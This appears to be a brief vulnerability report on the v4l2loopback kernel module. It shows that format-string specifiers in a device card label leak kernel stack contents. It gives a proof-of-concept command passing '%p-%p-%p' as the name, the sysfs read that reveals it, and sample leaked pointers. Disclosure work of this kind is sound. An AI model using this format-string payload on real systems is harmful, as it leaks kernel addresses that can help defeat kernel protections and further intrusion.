When adding a new video device with v4l2loopback-ctl
that contains a card label with format string modifiers the kernel driver interprets these when querying the device capabilities, thus leaking kernel memory (stack contents).
The vulnerability requires the attacker to have access to the /dev/v4l2loopback
, which is owned by root:root
with chmod 600
by default. This attack can still be used successfully against kernels in lock down mode.
v4l2loopback-ctl add -n "%p-%p-%p"
cat /sys/devices/virtual/video4linux/video2/name
Output (example):
/dev/video2
00000000de899e9f-00000000f6d35a
Expected:
/dev/video2
%p-%p-%p